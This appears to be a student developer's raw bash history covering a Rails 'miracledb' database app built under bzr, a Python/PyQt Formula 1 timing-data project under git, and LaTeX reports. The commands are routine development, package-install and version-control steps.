./tools/testall.py +. test.env +python3 ./tools/testall.py +ls +ls +rm pexpect-pexpect.tar +ls +.. +ls +ls +gen miracledb/ +ls +ls +ls +bzr update +vim README +ls +bzr shelf +bzr shelve +bzr diff +x3270 +x3270 +vim /home/aca08tog/.bash_aliases +resource +ibmchal +vim /home/aca08tog/.bash_aliases +resource +ibmchal +vim /home/aca08tog/.bash_aliases +resource +ls +ls +... +ls +ls +ks +ls +bzr update +vim Gemfile +ls +vim Gemfile +bundle +gem install mysql2 -v '0.3.7' +vim /home/aca08tog/.rvm/gems/ruby-1.9.2-p290/gems/mysql2-0.3.7/ext/mysql2/gem_make.out +sudo apt-get install mysql-common +sudo apt-get install libmysql-ruby libmysqlclient-dev +bundle +bzr status +bzr add . +bzr commit +ls +guard +ls +bzr status +be rails s +be rails devise:install +be rails generate devise:install +be rails s +ls +vim Gemfile +bundle +be rails s +vim G +vim Gemfile +ls +vim config/routes.rb +be rails s -d +vim config/routes.rb +vim app/views/layouts/application.html.haml +:q +bundle +be rails server restart +ls +less tmp/pids/ +less tmp/pids/server.pid +kill -9 4719 +bundle +be rails s +bundle +be rails s +bundle +be rails generate devise:views +$ for i in `find app/views/devise -name '*.erb'` ; do html2haml -e $i ${i%erb}haml ; rm $i ; done +for i in `find app/views/devise -name '*.erb'` ; do html2haml -e $i ${i%erb}haml ; rm $i ; done +be rails s +bundle upate +bundle update +be rails s +bundle +be rails s +bzr status +bzr add . +bzr commit -m "fixig the template thing" +:q +enscript +sudo apt-get install enscript +sudo apt-get install ps2pdf +ls +unzip aca08tog.zip +ls +ls +ls +enscript -Eobjc -C1 +enscript -Eobjc -C1 -r -2 -f Courier6 -G -p - * +l +enscript -Eobjc -C1 -r -2 -f Courier6 -G -p - ~/ +ls +enscript -Eobjc --color * +man enscript +enscript -Eobjc --color -p output.pdf * +gopen output.pdf +sudo apt-get install okular +sudo apt-get install acroread +man enscript +enscript -Eobjc --color -r -p output.pdf * +ls +rm Classes/output.pdf +enscript -Eobjc --color -r -p output.ps Classes/* +ps2pdf output.ps +ls +exit +ls +open learning.dvi & +ls +ls -a +open learning.dvi & +exit +tex +vim .vimrc +vim +vim .vimrc +vim blah.tex +sudo apt-get install texlive +sudo apt-get install texlive-bibtex-extra +mkdir texTest +;s +ls +vim learning.tex +latex learning.tex +ls +open learning. +open learning.dvi +ls +vim learning.tex +vim .vimrc +vim .vimrc +exit +vim .vimrc +exit +screen -r +ls +ls +ls +git pull git://github.com/scrooloose/snipmate-snippets.git +cp ~/Downloads/scrooloose-snipmate-snippets-15cb6bf.zip ./ +ls +unzip scrooloose-snipmate-snippets-15cb6bf.zip +ls +cp scrooloose-snipmate-snippets-15cb6bf/* . +ls +cp scrooloose-snipmate-snippets-15cb6bf/* ./ +ls +ls +cp ruby-rails/* ../ +cp ruby-shoulda/* ../ +cp ruby-rspec/* ../ +ls +ls +ls +vim ruby-rails.snippets +ls +vim svpo.snippet +ls +mv scrooloose-snipmate-snippets-15cb6bf/ruby* ./ +ls +exit +ls +ls +bzr checkout gs:2011-miracledb/branches/crud +kls +ls +screen guard +./setup +bzr update +ls +./setup +screen guard +vim spec/models/author_spec.rb +resource +vim spec/models/author_spec.rb +exit +ls +bzr updarte +bzr update +ls +screen guard +screen -r +vim app/models/author.rb +be rails generate migration CreateRequestTypeMiracleJoinTable +screen vim app/models/ +screen -r +screen -r 2978.pts-1.aca08tog-ubuntu +screen -r 3230.pts-1.aca08tog-ubuntu +be rake db:migration +be rake db:migrate +screen -r 3230.pts-1.aca08tog-ubuntu +be rails generate migration CreateMiracleRecipentJoinTable +screen -r 3230.pts-1.aca08tog-ubuntu +be rake db:migrate +be rails generate migration CreateCategoryMiracleJoinTable +screen -r 3230.pts-1.aca08tog-ubunt +be rake db:rollback +rm db/schema.rb *.sqlite3 +rm db/schema.rb +rm db/*.sqlite3 +be rake db:migrate +screen -r 2978.pts-1.aca08tog-ubuntu +screen 0r +screen -r +bzr status +bzr add . +bzr commit +exit +ssh +sftp +exit +ssh root@ +sftp root@ +ssh root@ +sftp +ssh +exit +ssh tobygilham.com +ssh +exit +vim .bash_aliases +resource +ls +bzr update +./setup +guard +exit +vim .bash_aliases +resource +ls +vim .bashrc +vim .bash_aliases +resource +ls +ssh-deadwood +ls +ls +ls +vim app/models/miracle.rb +bzr status +bzr commit -m "boom, fixing miracle" +ssh-deadwood +ssh-deadwood +exit +ls +ls +bzr update +ls +vim db/schema.rb +ls +exit +ls +ls -a +vim .bash_aliases +vim .bashrc +vim .bash_profile.local +vim .bash_profile +vim .bash_tweaks +vim .bash_aliases +resource +ls +vim .vimrc +ls +bzr update +ls +vim features/miracle.feature +ls ~/.vim/vim-addons/snipmate-snippets/snippets/ +grep datek_known +grep datek_known *.rb +grep datek_known */*.rb +find / | grep datek_known +find ./ | grep datek_known +find ./ | grep -i datek_known +ls +find ./ +find . | xargs grep datek_known +bzr update +vim features/author.feature +s +ls +ls +uzip fsouza-snipmate-snippets-564c7cc.zip +unzip fsouza-snipmate-snippets-564c7cc.zip +ls +ls +cp -r cucumber/ ~/.vim/vim-addons/snipmate-snippets/snippets/ +ls +ssh-dead +ssh-deadwood +ssh tobygilham.com +ls +ls +ls +vim features/author.feature +rm features/author.feature +bzr status +ls +bzr update +ls +ls +./setup +ls +screen guard +screen -r +ls +vim features/miracle.feature +vim spec/models/miracle_spec.rb +vim /home/aca08tog/.vimrc +vim spec/models/miracle_spec.rb +vim /home/aca08tog/.vimrc +vim spec/models/miracle_spec.rb +vim /home/aca08tog/.vimrc +vim spec/models/miracle_spec.rb +bzr uncommit +ls +bzr status +bzr rollback +bzr revert +ls +exit +screen -r +ssh-deadwood +ssh +ssh-keygen -f "~/.ssh/known_hosts" -R +ssh-keygen -f "/home/aca08tog/.ssh/known_hosts" -R +ssh +exit +bzr update +vim features/miracle.feature +bzr update +inst mdbtools +ls +mdb-schema The\ Miraculous\ Database.accdb +mdb-parsecsv The\ Miraculous\ Database.accdb +mdb-tables The\ +mdb-tables The\ Miraculous\ Database.accdb +x3270 +ls +ls +ls +ipython --pylab +ls +ipython +vim datastructthingy.py +python datastructthingy.py +ipython datastructthingy.py +ipython datastructthingy.py +ipython +ld +ls +vim datastructthingy.py +ipython datastructthingy.py +ipython datastructthingy.py lol +ipython datastructthingy.py 'lol' +vim datastructthingy.py +ipython datastructthingy.py 'lol' +ipython datastructthingy.py lol +ipython datastructthingy.py Timing\ Data/0327_Australia/Q/Qualifying\ Session\ Sector\ Analysis.mat +ipython +ipython datastructthingy.py Timing\ Data/0327_Australia/Q/Qualifying\ Session\ Sector\ Analysis.mat +4exit +exit +ipython +exit +ls +vim datastructthingy.py +git config --global user.name "Toby Gilham" +git config --global user.email Tobias1087@gmail.com +ls +mkdir f1stuff +git init +touch README +git add . +git commit -m "first commit" +git remote add origin git@github.com:Tobias1087/f1stuff.git +git push -u origin master +less ~/.ssh/id_rsa.pub +git push -u origin master +cp ~/Downloads/darwin/ +cp ~/Downloads/darwin/datastructthingy.py ./ +ls +git add . +git commit -m "data read in " +git push +ls +ipython +exit +ls +ls +git pull +cp ~/Downloads/darwin/Timing\ Data/0710_GreatBritain/Q/*.mat ./ +ls +mv Qualifying\ Session\ Sector\ Analysis.mat data.mat +ls +ipython datastructthingy.py data.mat +ipython datastructthingy.py 'data.mat' +vim datastructthingy.py +exit +ls +ls +git pull +ls +vim simulator.py +ls +vim +vim data +vim datastructthingy.py +vim /home/aca08tog/.vimrc +vim datastructthingy.py +ipython simulator.py +ls +ipython simulator.py +ls +ipython simulator.py +ls +ipython simulator.py +ls +ipython simulator.py +ls +vim simulator.py +ipython simulator.py +pyqt +l +ipython +ls +git pull +python stopwatchui +ipython stopwatchui.py +sudo apt-get install python-qt4-dev +ipython stopwatchui.py +sudo apt-get install python-qt4 +ls +ipython stopwatchui.py +resource +ipython stopwatchui.py +python +ls +ipython +ipythonqt +ipython-qt +python stopwatchui.py +ls +vim stopwatchui.py +python stopwatchui +python stopwatchui.py +ls +python stopwatchui.py +ipython stopwatchui.py +ls +l +ls +ls -a +ls -l +vim python-config +:q +ls +vim stopwatchui.py +:q +ls +ls +python +ls +ls +ls -l +ls -lp +ls -l +ls -la +ls +ls /bin/ +ls / +ipython -gui=qt +ipython --pylab=qt +ls +ls +vim EPD_README.txt +ls include/ +exit +ls +ls +remove-EPD-7.1-2 +ls +ls +easy_install ipython +inst python-setuptools +easy_install ipython +sudo easy_install ipython +ipython +resource +ipython +hg clone +ls +ipython +ls +ipython --pylab +easy_install matplotlib +sudo easy_install matplotlib +sudo easy_install pylab +ls +ipython-qtconsole +easy_install epd +sudo easy_install epd +sudo apt-get install pylab +easy_install numpy +sudo easy_install numpy +ls +exit +ipython +sudo apt-get purge ipython +exit +exit() +ls +git stash +git stash list +git pop +git stash show +ls +python stopwatchui +python stopwatchui.py +git branch filedaial +git stash pop +git commit +git status +git add . +git stast pop +git stash pop +ls +vim stopwatchui.py +exit +python stopwatchui.py +exit +ls +git stash +git pull +ls +l +ls +python +install numpy +inst numpy +inst python-numpy +ls +python stopwatchui.py +inst python-scipy +python stopwatchui.py +vim stopwatchui.py +ls +git revert +git revert master +git commit +git push +ls +git status +git revert +git revert master +ls +git branch +l +exit +ls +rm f1stuff/ +rm -rf f1stuff/ +ls +mkdir f1stuff +ls +git checkout git@github.com:Tobias1087/f1stuff.git +git init +git checkout git@github.com:Tobias1087/f1stuff.git +git pull git@github.com:Tobias1087/f1stuff.git +ls +vim datastructthingy +vim datastructthingy.py +python stopwatchui.py +cp ~/Downloads/darwin/Timing\ Data/0327_Australia/Q/*.mat rsa.mat +ls +python stopwatchui.py +vim stopwatchui.py +ls +python stopwatchui.py +resource +python stopwatchui.py +python +python stopwatchui.py +ls +python stopwatchui +python stopwatchui.py +vim stopwatchui.py +python stopwatchui.py +ls +python stopwatchui.py +git pull +git +git pull +ls +rm -rf f1stuff/ +ls +git clone git@github.com:Tobias1087/f1stuff.git +python stopwatchui.py +cp ~/Downloads/darwin/Timing\ Data/0327_Australia/Q/*.mat rsa.mat +ls +python stopwatchui.py +python +python stopwatchui.py +vim rsa.mat +ls +vim datastructthingydemo.py +vim datastructthingy.py +python +ipython stopwatchui.py +sudo apt-get install ipython +sudo apt-get install --reinstall python +python +python stopwatchui.py +pip +python +ls +python datastructthingydemo.py +vim datastructthingydemo.py +python datastructthingydemo.py +ls +python stopwatchui.py +ls +vim stopwatchui.py +exi +python stopwatchui.py +ls +python stopwatchui.py +top +ps aux | grep python +kill -9 6414 +kill -9 6413 +ls +ls +git pull +python stopwatchui.py +ipython stopwatchui.py +sudo apt-get remove python-numpy +ipython stopwatchui.py +sudo apt-get install python-scipy +python stopwatchui.py +sudo +python --version +python3 stopwatchui +python3 stopwatchui.py +py2to3 -w * +2to3 -w * +ls +python3 stopwatchui.py +rm -rf f1stuff/ +git clone git@github.com:Tobias1087/f1stuff.git +ls +python3 timerdemo.py +python timerdemo.py +ls +cp ~/Downloads/darwin/Timing\ Data/0710_GreatBritain/Race/Race\ Sector\ Analysis.mat rsa.mat +python timerdemo.py +python stopwatchui.py +ls +python stopwatchui.py +ls +python stopwatchui.py +git pull +python stopwatchui.py +ls +vim stopwatchui.py +git status +git commit +git commit -a +git push +ls +python stopwatchui.py +ls +ls +git pull +ls +exit +ls +bzr update +ls +vim Gemfile +bundle +be rails g nifty:scaffold Rank name:string +be rails d scaffold Rank +be rails destroy scaffold Rank +be rails destroy +bzr revert +ls +bzr status +.. +rm -rf crud/ +bzr checkout gs:2011-miracledb/branches/crud +be rails g scaffold Rank name:string +./setup +be rails g scaffold Rank name:string +be rails g scaffold Social_standing name:string +be rails g scaffold building_type name:string +be rails g scaffold polity name:string +be rails g scaffold nearest_named_town name:string +be rails g scaffold feast_day name:string +be rails g scaffold work name:string +be rails g scaffold provenance name:string +be rails g model gender name:string +be rails g model categories name:string description:string +be rails g scaffold categories name:string description:string +be rails destroy scaffold category +be rails g scaffold category name:string description:string mega_category_id:integer +be rails g scaffold mega_category name:string description:string +be rails g scaffold request_type name:string +be rails g scaffold name:string gender_id:integer social_standing_id:integer rank_id:integer provenance_id:integer +be rails g scaffold recipients name:string gender_id:integer social_standing_id:integer rank_id:integer provenance_id:integer +be rails g scaffold miracle_worker name:string rank_id:integer gender_id:integer date_of_death:string locale:string +be rails g scaffold location name_of_institution:string region_id:integer nearest_named_town_id:integer polity_id:integer +ls +rm -rf crud/ +bzr checkout gs:2011-miracledb/branches/crud +ls +vim /home/aca08tog/.bash_history +exit +vim .bash_history +:q +ls +./setup +be rails g scaffold rank name:string +be rails g scaffold Social_standing name:string +be rails g scaffold Rank name:string +be rails g scaffold Social_standing name:string +be rails g scaffold building_type name:string +be rails g scaffold polity name:string +be rails g scaffold nearest_named_town name:string +be rails g scaffold feast_day name:string +be rails g scaffold work name:string +be rails g scaffold provenance name:string +be rails g model gender name:string +be rails g model categories name:string description:string +be rails g scaffold categories name:string description:string +be rails destroy scaffold category +be rails g scaffold category name:string description:string mega_category_id:integer +be rails g scaffold mega_category name:string description:string +be rails g scaffold request_type name:string +be rails g scaffold name:string gender_id:integer social_standing_id:integer rank_id:integer provenance_id:integer +be rails g scaffold recipients name:string gender_id:integer social_standing_id:integer rank_id:integer provenance_id:integer +be rails g scaffold miracle_worker name:string rank_id:integer gender_id:integer date_of_death:string locale:string +be rails g scaffold location name_of_institution:string region_id:integer nearest_named_town_id:integer polity_id:integer +bzr rails g scaffold miracle date_known:boolean month:integer year:string day_of_month:integer chapter:string summary:string +be rails g scaffold miracle date_known:boolean month:integer year:string day_of_month:integer chapter:string summary:string +bzr add . +bzr commit +bzr push +ls +unzip darwin +unzip darwinMatlab.zip +ls +rm *.m +ls +mkdir darwin/matlabstuff +unzip darwinMatlab.zip darwin/matlabstuff/ +unzip darwinMatlab.zip darwin/matlabstuff +man unzip +unzip darwinMatlab.zip -d darwin/matlabstuff +inst ocatave +inst octave +ls +octave cutoffPredictor.m +octave getSectorAnalysis.m +octave radarDirectory.m +ls +vim cutoffPredictor.m +octave cutoffCallbackHandler.m +ls +ls +ls +octave windSeriesPlot.m +octave +ls +octave +octave -q cutoffPredictor.m +octave -v cutoffPredictor.m +man octave +octave +ls +vim cutoffPredictor.m +octave +vim getSectorAnalysis.m +ls +vim playCanada +vim playCanada.m +ls +sftp stulogindcs.shef.ac.uk +sftp stulogin.dcs.shef.ac.uk +ssh stulogin.dcs.shef.ac.uk +ssh -x stulogin.dcs.shef.ac.uk +ls +exit +ls +ls +python stopwatchui +python stopwatchui.py +sudo apt-get install gtk2-engines-pixbuf +python stopwatchui.py +ipython-qtconsole +vim +ls +ls +vim ass1.py +vim /home/aca08tog/.vimrc +vim ass1.py +exit +ls +ls +cp mnist.pkl.gz ~/ml/ +mkdir ~/ml +cp mnist.pkl.gz ~/ml/ +ls +ipython +ls +yoke +loke +yolk +inst python-yolk +pip install yok; +pip install yolk +inst python-pi[ +inst python-pip +pip install yolk +sudo pip install yolk +yok +yolk +yolk -l +ipython +ipython --pylab +yolk -l +sudo apt-get purge ipython +yolk +yolk -l +ipython +pip install ipython +pip remove ipython +man pip +pip uninstall ipython +sudo pip uninstall ipython +ipython +pip install ipython +sudo pip install ipython +ipython +sudo apt-get install python-matplotlib +ipython +ipython --pylab +pip install kernmagic +ipython --pylab +vim .vimrc +vim +vim .vimrc +ipython qtconsole +sudo apt-get install python-pygments +ipython qtconsole +sudo apt-get install pyzmq +pip install zmq +pip install pyzmq +sudo pip install pyzmq +ipython kernal +ipython kernel +ipython-kernek +ipython-kernel +ls +ls +bzr update +vim db/schema.rb +bzr status +bzr commit -m "data model stuff" +ls +octave demTimingData.m +ssh stulogin.dcs.shef.ac.uk +ssh -x stulogin.dcs.shef.ac.uk +ls +vim ferrariToolboxes.m +:q +octave +ls +octave demTimingData.m +ssh -X stulogin.dcs.shef.ac.uk +sftp stulogin.dcs.shef.ac.uk +ssh -X stulogin.dcs.shef.ac.uk +:q +ls +ssh -X stulogin.dcs.shef.ac.uk +ls +exit +ls +ssh -X stulogin.dcs.shef.ac.uk +exit +ls +ls +unzip Meteo\ France.zip +ls +ipython +ls +sudo apt-get install qt4-designer qt4-dev-tools +designer-qt4 +exit +ls +ssh stulogin.dcs.shef.ac.uk +exit +ssh -X stulogin.dcs.shef.ac.uk +exit +ssh -X stulogin.dcs.shef.ac.uk +exit +ls +ls Documents/ +ls Downloads/ +find *.ui +find ./ +grep *.ui +ls +ls Downloads/ +ls Downloads/*.ui +ls +ls +pyuic4 cutoff.ui +man pyuic4 +pyuic4 cutoff.ui -o cutoff.py +ls +python cutoff.py +vim cutoff.py +python cutoff.py +vim cutoff.py +:q +ls +ssh ml.shef.ac.uk +visudeo +visudo +sudo visudo +ls +ssh -X dcs.shef.ac.uk +ssh -X stulogin.dcs.shef.ac.uk +ls +ls +pyuic4 cutoff.ui +pyuic4 cutoff.ui -o cutoff.py +exit +ssh ml.shef.ac.uk +exit +ls +ls +vim cutoff.py +ls +bzr update +ls +vim db/schema.rb +vim +:q +ls +be rails g migration create_categories_miracles_join_table +be rails g migration create_miracles_recipients_join_table +be rails g migration create_locations_miracles_join_table +be rails g migration create_authors_works_join_table +be rake db:migrate +be rails g migration RemoveAuthorIdFromWorks +be rake db:migrate +bzr status +bzr add . +bzr commit -m "adding linker tables, apart from the HABTM:through of miracle worker" +:q +ls +ls -la +ls +ls +sftp stulogin.dcs.shef.ac.uk +exit +ssh stulogin.dcs.shef.ac.uk +s +ls +be rake spec +guard +vim genesys/miracledb/crud/spec/models/miracle_spec.rb +:q +be rake spec +be rails g migration AddAuthorIdToMiracles author_id:integer +less db/migrate/201111 +less db/migrate/20111121173013_add_author_id_to_miracles.rb +be rake db:migrate +be rake spec +bzr status +bzr add . +bzr commit -m "specs to green :)" +be rake cucumber +be rails g migration create_miracle_workers_miracles_join_table living:boolean +be rake db:migrate +be rake cucumber +be rake db:rollback +be rake db:drop +be rake db:migrate +be rake cucumber +be rails g migration create_miracles_request_types_join_table +be rake db:migrate +be rake cucumber +bzr status +bzr add . +bzr commit -m "forgot some linker tables but the HM:Through still not cleared up but linker table there" +exit +ls +ls +cat ~/.ssh/id_rsa.pub +ls +ls +mkdir darwin +rm darwin/ +rm -rf darwin/ +ls +mkdir darwinproject2011 +git init +vim README +git add . +git commit -m "First Commit" +git remove add origin git@git.assembla.com:darwinproject2011.git +git remote add origin git@git.assembla.com:darwinproject2011.git +git push origin master +ls +ls +ls -la +rm -rf .git* +ls +ls -la +mv f1stuff/ darwinproject2011/cutoffpredictor +ls +ls +ls +cp ~/Downloads/darwin/cutoff.* ./ +ls +ls +git status +git add . +ls +git status +git commit +ls +git push +vim ~/.vimrc +ls +vim biweek1.tex +ls +mkdir darwin +mv darwinproject2011/ darwin/ +ls +mv biweek* darwin/ +ls +ls +rm *.aux +ls +rm *.log +ls +rm *.dvi +s +ls +ls -la +mv biweek1.* biweekly1.* +ls +mv biweek1.pdf biweekly1.pdf +mv biweek1.tex biweekly1.tex +ls +exi +exit +ls +ls +bzr update +ls +ls +vim seeds.rb +ls data/ +less data/Measuring\ the\ Miraculous.txt +less data/Location.txt +ls +vim data/Measuring\ the\ Miraculous.txt +ls +vim seeds.rb +:q +ls +unzip data.zip -D data/ +ls +man unzip +unzip data.zip -d data/ +ls +mv data/* ~/genesys/miracledb/trunk/db/data/ +mkdir ~/genesys/miracledb/trunk/db/data/ +mv data/* ~/genesys/miracledb/trunk/db/data/ +ls +ls +ruby seeds.rb +irb +ruby seeds.rb +ls +vim AU +vim Authors.txt +.. +ruby seeds.rb +ls +less data/Authors.txt +ruby seeds.rb +irn +irb +ruby seeds.rb +vim schema.rb +ruby seeds.rb +rake db:seed +be rake db:seed +be rake db:seed +./setup +be rake db:seed +ls +ls +mv data/* ./ +ls +rm -rf data/ +ls +be rake db:seed +be rake db:seed +be rake db:seed +be rails console +ls +be rails c +sudo apt-get install libncurses5-dev libreadline5-dev +rvm package install readline +rvm pkg install readline +rvm remove 1.9.2 +rvm install 1.9.2 --with-readline-dir=$rvm_path/usr +be rails c +sudo apt-get install libncurses5-dev +sudo apt-get install libreadline6-dev +ls +ls -la +ls +rvm package install readline +rvm pkg install readline +ls +be rails c +ls +ls +ls +ls r* +rvm remove 1.9.2 +rvm remove 1.9.2 +rvm install 1.9.2 --with-readline-dir=$rvm_path/usr +ls .rvm/src/ruby-1.9.2-p290/ +ls +ls +be rails c +be rake db:seed +ls app/models/ +be rake db:seed +vim app/models/nearest_named_town.rb +be rake db:seed +vim db/Location.txt +be rake db:seed +ls +be rake db:seed +ls +ls +gvim Location.txt +gedit Location.txt +.. +be rake db:seed +ls +vim spec/models/miracle_ +vim spec/models/miracle_spec.rb +be rake db:seed +ls +man iconv +iconv -l +iconv -f iso-8859-15 -t utf-8 db/*.txt --output db/*.txt +be rake db:seed +unzip /home/aca08tog/Downloads/data.zip -d ./db/data/ +ls +ls +ls +iconv -f iso-8859-15 -t utf-8 *.txt --output *.txt +ls +be rake db:seed +ls +be rake db:seed +be rake db:drop +be rake db:migrate +be rake db:drop +be rails g migration RemoveWorkIdFromAuthors +be rake db:migrate +be rake db:seed +vim reseed +chmod +x reseed +ls +./reseed +./reseed # +./reseed +be rake db:seed +irb +be rake db:seed +./reseed +be rake db:seed +irb +be rake db:seed +./reseed +ls +bzr status +bzr add . +bzr commit -m "Seeding" +bzr update +bzr commit -m "Seeding" +sudo apt-get install pd-extended +sudo apt-get install pd-windowing +sudo apt-get install pd-plugin +sudo apt-get install puredata-extra +sudo apt-get install pd-* +sudo apt-get install pd-ext13 +ls +ls +pdextended ass1.pd +cp ass1.pd ass3.pd +ls +pdextended ass3.pd +resource +pdextended ass3.pd +ls +ls +pd +pdextended ass3.pd +ls +ls +ls +vim ass3.tex +ls +sftp stulogin.dcs.shef.ac.uk +ssh -X stulogin.dcs.shef.ac.uk +exit +ls +ls +vim cutoff.py +:q +ls +ssh stulogin.dcs.shef.ac.uk +exit +ssh root@ +ssh-keygen -f "/home/aca08tog/.ssh/known_hosts" -R +ssh root@ +exit +ls +ls +sftp +exit +ssh -X stulogin.dcs.shef.ac.uk +exit +ls +sftp +exit +sftp +ls +less .vimrc +ls +tar xvzf bashstuff.tar.gz -d bash +tar xvzf bashstuff.tar.gz bash/ +mv bashstuff.tar.gz Downloads/ +ls +ls +mkdir bash +mv bashstuff.tar.gz bash +ls +ls +tar xvzf bashstuff.tar.gz +ls +cp .vimrc ~/ +exit +resource +vim +sftp +exit +sftp +ssh +sftp +ssh +exit +ls +ls +minecraft +exit +ls +bzr pull +git pull +ls +git pull +ls +ls +ls +git update +ls +rm darwinproject2011/ +rm -rf darwinproject2011/ +ls +git clone git@git.assembla.com:darwinproject2011.git +ls +ls +ls +ls +ls +ls +python basic_gp.py +vim basic_gp.py +ls +cp ~/Downloads/darwin/Timing\ Data/0710_GreatBritain/FP3/Third\ Practice\ Session\ Sector\ Analysis.mat ./fp3.mat +ls +python basic_gp.py +l +ls +vim datastructthingy.py +vim cutoff.py +designer-qt4 cutoff.ui +ls +uic-qt4 cutoff.py +uic-qt4 cutoff +uic-qt4 cutoff.ui +uic-qt4 cutoff.ui -o cutoff.py +ls +vim cutoff.py +rm cutoff.py +man ui +man uic +man uic-qt4 +ls +uic +pyuic4 cutoff.ui -o cutoff.py +ls +vim cutoff.py +ls +git status +git add . +git commit -m "fiddling with UI" +git push +exit +minecraft +ls +ls +minecraft +exit +ls +ls +pyuic4 cutoff.ui -o cutoff.py +ls +vim cutoff.py +vim datastructthingy +vim basic_gp.py +ls +python stopwatchui.py +git commit -m "Changed driverdata to a dictionary for ease of stuff, may break jon's test #code" +git push +git commit -m "Changed driverdata to a dictionary for ease of stuff, may break jon's test code" +ls +ls +git status +git commit -am "Changed driverdata to a dictionary for ease of stuff, may break jon's test code" +exi +exit +ls +ls +git pull +ls +ls +less cutoff.py +vim cutoff.py +exit +ls +l +ls +sudo apt-get install pyflakes +vim cutoffdemo.py +resource +ls +vim cutoffdemo.py +vim /home/aca08tog/.vimrc +vim cutoffdemo.py +vim /home/aca08tog/.vim +vim /home/aca08tog/.vimrc +vim cutoffdemo.py +vim /home/aca08tog/.vimrc +vim cutoffdemo.py +ls +exit +wgets/latex/contrib/moderncv/moderncv.cls +ls +mv moderncv.cls Documents/ +ls +vim CV.tex +vim /home/aca08tog/.vimrc +vim CV.tex +vim /home/aca08tog/.vimrc +vim CV.tex +ls +vim CV.tex +:q +ls +vim CV.tex +la +ls +vim CV.tex +wgets/latex/contrib/etoolbox/etoolbox.sty +vim CV.tex +wgets/latex/contrib/moderncv/moderncvcompatibility.sty +vim CV.tex +wgetschiotz/comp/LatexTips/tweaklist.sty +ls +vim CV.tex +wgets/latex/contrib/moderncv/moderncvthemecasual.sty +vim CV.tex +rm CV.tex +cp ~? +cp ~/Downloads/template.tex ./ +ls +mv template.tex CV.tex +vim CV.tex +ls +rm tweaklist.sty +wgets/latex/contrib/moderncv/tweaklist.sty +vim CV.tex +ls +vim CV.tex +:q +ipython +ls +ipython +ls +s +ls +vim cutoffdemo.py +:q +ls +ls +ls +ls +ls +unzip GPS\ Data\ 2011\ Races\ \(1\).zip +;s +ls +ls +ls +exit +ls +ls +python life.py +python -m unittest discover +python life.py +nosetests life.py +exit +ls +mkdir GCR +ls +git init +ls +vim life.py +ls +touch life.py +ls +vim life.py +vim life.py +less ~/genesys/miracledb/trunk/spec/spec_helper.rb +ls +vim life.py +pip nose +pip install nose +sudo pip install nose +nosetests +nosetests life.py +vim life.py +screen -r +vim life.py +ls +rm * +ls +exit +quit +ls +ls +exit +python +exit +ls +ls +vim gameoflife.py +ls +vim gameoflife.py +:q +ls +nosetests gameoflife.py +ls +nosetests gameoflife.py +gnuplot +q +:q +exit +ls +ls +ls +gnuplot gnuplotthis +ls +open ~/Downloads/darwin/timingReport.pdf +ls +less plotthis.csv +less korea.csv +ls +open test.eps & +sudo apt-get install gnuplot +ls +ls +git pull +ls +ls +open FinalReport.pdf & +ls +vim FinalReport.tex +ls +open GaussianTree.eps +ls +git status +git stash +git pull +vim FinalReport.tex +git status +git commit -am "changing logs to \logs" +git push +cp ~/Downloads/Book2.csv ./korea.csv +ls +gnuplot +ls +ipython +ls +less plotthis.csv +gnuplot +vim plot +gnuplot +ls +vim gnuplotthis +ls +git pull +git status +git add koreaScatter.eps +ls +rm test.eps +ls +git status +git add . +ls +git +git status +ls +open koreaScatter.eps & +git commit -m "GNUplot for korea" +git push +ls +vim korea.csv +vim gnuplotthis +git stash +ls +gnuplot +less korea +less korea.csv +vim korea.csv +less korea.csv +gnuplot +ls +vim gnuplotthis +git stash +ls +ipython +calc korea +libreoffice korea.csv +less korea.csv +gnuplot +ls +less plotthis.csv +libreoffice korea.csv +ipython +ls +less nonlog.csv +gnuplot +ls +git pull +vim FinalReport.t +vim FinalReport.tex +git status +vim FinalReport. +vim FinalReport.tex +git commit -am "explain power law relationship" +git push +git pull +exit +less darwin/darwinproject2011/documents/Interimreport/korea.csv +exit +ls +ls +bzr update +./setup +ls +be rails s +be rails s -d +ls +vim db/seeds.rb +bzr status +bzr revert +bzr branch gs:2011-miracledb/trunk gs:2011-miracledb/branches/dataimportcrazyness +bzr checkout gs:2011-miracledb/branches/dataimportcrazyness +top +ls trunk/tmp/ +ls trunk/tmp/pids/ +less trunk/tmp/pids/server.pid +cat trunk/tmp/pids/server.pid +kill -9 2595 +ls +ls +vim db/seeds.rb +quit +:q +be rails g migration CreateBuildingTypeMiraclesJoinTable +./setup +be rails g migration CreateBuildingTypeMiraclesJoinTable +vim db/data/MeasuringtheMiraculous.txt +gedit db/data/MeasuringtheMiraculous.txt +libreoffice db/data/MeasuringtheMiraculous.txt +ls +ls +vim db/seeds.rb +:q +irb +rvm use 1.9.2 +irb +./reseed +be rake db:seed +vim db/seeds.rb +:q +bzr add . +bzr update +bzr +bzr commit -m "half way through seed changes" +quit +irb +rvm use 1.9.2 +irb +./reseed +be rake db:seed +./reseed +rake db:seed +./reseed +ls +./reseed +exit +ls +vim db/seeds.rb +:x +:q +ls +./reseed +ls +be rails g migrations removeRecipientsIDFromMiracles +ls +be rails g migration removeRecipientsIDFromMiracles +ls +be rails g migration changingYearsAndCenturiesToStartYearEndYearAndStartCentEndCent +ls +be rake db:seed +be rake db:migrate +be rake db:seed +irb +ls +irb +ls +be rake db:seed +irb +./reseed +irb +./reseed +ls +ls db/data/ +./reseed +exit +ls +ls +vim db/seeds.rb +ls +bzr status +bzr add db/migrate/* +bzr status +vim db/seeds.rb +bzr commit -m "well i think thats mostly done, still got categories to do." +bzr commit -m "well i think thats mostly done, still g +ls +vpn-sheffield +bzr commit -m "well i think thats mostly done, still g +ot categories to do " +kill 7604 +sudo kill -9 7604 +ls +exit +vpn-sheffield +top +ls +ls +vim db/seeds.rb +vim app/views/miracle/ +vim app/views/miracles/index.html.haml +grep year +vim app/views/miracles/index.html.haml +:q +ls +ls +be rake spec +be rake cucumber +ls +ls spec/factories/ +be rake +~ +be rake +be rake cucumber +bzr merge +bzr status +bzr commit -m "its alll fine honest" +bzr update +bzr merge +bzr merge gs:2011-miracledb/trunk +bzr resolve +be rake +./setup +be rake +be rake cucumber +bzr status +bzr update +bzr commit +bzr merge gs:2011-miracledb/branches/dataimportcrazyness +bzr update +bzr merge gs:2011-miracledb/branches/dataimportcrazyness +bzr status +bzr commit -m "merged the data" +bzr status +ls +vim magic +./magic +:q +irb +rvm use 1.9.2 +irb +ls +be rails c +ls +vim db/schema.rb +:q +ls +rvm use 1.9.2 +irb +ls +vim db/seeds.rb +ls +bzr status +bzr commit -m "boom dataimport seeding done?, maybe need to talk about Living on MiracleWorkers/Miracles linkers. But yeah, seems like its done" +bzr update +bzr commit -m 